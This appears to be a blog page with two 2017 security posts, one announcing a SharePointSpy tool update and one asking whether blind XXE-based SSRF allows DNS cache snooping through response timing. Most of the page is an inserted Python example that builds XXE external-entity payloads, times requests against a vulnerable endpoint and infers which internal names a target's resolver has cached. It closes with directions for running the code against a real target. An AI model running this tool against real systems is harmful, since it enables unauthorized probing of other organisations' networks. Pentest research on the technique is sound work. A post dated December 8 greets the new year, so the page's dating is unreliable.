Friday, December 8, 2017
Happy New Year & Big SharePointSpy update!
Happy New Year!! I hope everyone's is better than the last! To bring in the new year, there is a big update to SharePointSpy already available on GitHub! It features a new, more user-friendly UI and an anonymous or specific-user scan! Please check it out and let me know what you think. Thank you and good luck in the new year!
Sunday, December 3, 2017
DNS cache snooping via Blind XXE based SSRF?
Is this a thing? You tell me.
Say you have an XXE vuln that lets you make HTTP calls only (SSRF) on a pentest. You know it's working only because you see packets over port 80 to a server you control coming from the target system: no data exfil or other fun stuff, so no output of any kind other than server response times. Not much you can do, right? Well, while playing around I noticed the response time was long when I looked for domains that don't exist. So I switched to subdomains of good root domains and saw the same delay... That is DNS cache snooping, yeah? If so, it's a newish, kinda worthless attack vector, I think. At least I have not seen any papers on it, so it might be new. What do you think?
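The timing channel described in the post, worked through as an added example (this is not the author's code or tooling). It assumes a hypothetical XXE-vulnerable endpoint that accepts a POSTed XML body and takes longer to answer while the target's resolver performs a lookup for the external entity's host; the target URL, the attacker domain `attacker.example` and all timings are constructed. The key practical detail is that the first probe for a name is the only one that can hit a cold cache, because the probe itself populates the resolver's cache (for NXDOMAIN as well, via negative caching), so each candidate is compared against its own repeats rather than against a global threshold.

```python
"""Infer resolver cache state from the response delay of a blind XXE/SSRF.

Added example. Target URL, attacker domain and timings are constructed."""
import itertools
import random
import statistics
import time
import urllib.request
from typing import Callable, Dict, List


def build_payload(hostname: str, path: str = "/") -> bytes:
    """XML whose external general entity makes the target's parser fetch
    http://hostname/path. Nothing comes back; only the delay is observed."""
    doc = (
        '<?xml version="1.0"?>\n'
        '<!DOCTYPE probe [\n'
        f'  <!ENTITY xxe SYSTEM "http://{hostname}{path}">\n'
        ']>\n'
        '<probe>&xxe;</probe>\n'
    )
    return doc.encode()


def http_timer(target_url: str, timeout: float = 30.0) -> Callable[[str], float]:
    """Timing oracle against a (hypothetical) vulnerable endpoint: POST the
    payload for `hostname` and return the round-trip time in seconds."""
    def timed(hostname: str) -> float:
        req = urllib.request.Request(
            target_url, data=build_payload(hostname),
            headers={"Content-Type": "application/xml"}, method="POST")
        start = time.perf_counter()
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                resp.read()
        except Exception:
            pass  # error responses and timeouts still carry timing information
        return time.perf_counter() - start
    return timed


def probe(timer: Callable[[str], float], hostname: str, rounds: int = 4) -> Dict[str, float]:
    """Time the first request for hostname, then `rounds` repeats. Only the
    first request can miss the cache: the resolver caches the answer (or
    the NXDOMAIN) as a side effect, so the repeats are the warm baseline."""
    first = timer(hostname)
    warm = statistics.median(timer(hostname) for _ in range(rounds))
    return {"first": first, "warm": warm, "delta": first - warm}


def calibrate(timer: Callable[[str], float], fresh_name: Callable[[], str], rounds: int = 4) -> float:
    """Cost of a guaranteed-cold lookup on this target. fresh_name() must
    return a label under a domain you control that nobody has resolved."""
    deltas = [probe(timer, fresh_name(), rounds)["delta"] for _ in range(3)]
    return statistics.median(deltas)


def snoop(timer: Callable[[str], float], candidates: List[str], cold_cost: float,
          rounds: int = 4) -> Dict[str, str]:
    """A first-probe penalty near the calibrated cold cost means the resolver
    had to fetch the name (not cached); a first probe as fast as its repeats
    means it was already cached. Each candidate can be tested once per TTL."""
    verdicts = {}
    for name in candidates:
        delta = probe(timer, name, rounds)["delta"]
        verdicts[name] = "not cached" if delta >= cold_cost / 2 else "cached"
    return verdicts


class SimulatedResolver:
    """Constructed stand-in for the target: 50 ms base latency, a 250 ms
    penalty for any name not yet in the cache, and a little jitter."""
    def __init__(self, cached, seed: int = 1):
        self.cache = set(cached)
        self.rng = random.Random(seed)

    def __call__(self, hostname: str) -> float:
        penalty = 0.0 if hostname in self.cache else 0.25
        self.cache.add(hostname)  # the lookup itself warms the cache
        return 0.05 + penalty + self.rng.uniform(-0.01, 0.01)


def demo() -> Dict[str, str]:
    target = SimulatedResolver(cached={"intranet.example", "mail.example"})
    counter = itertools.count()
    fresh = lambda: f"p{next(counter)}.attacker.example"  # constructed, never-resolved labels
    cold_cost = calibrate(target, fresh)
    return snoop(target, ["intranet.example", "mail.example",
                          "vpn.example", "nope.example"], cold_cost)


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(f"{name:20s} {verdict}")
```

Against a real target, swap `SimulatedResolver` for `http_timer("https://target.example/upload")` and keep `rounds` high enough to average out network jitter, which is usually far larger than the simulated 10 ms; `nope.example` shows why a nonexistent name looks exactly like an uncached real one, which matches the delay the post reports for both.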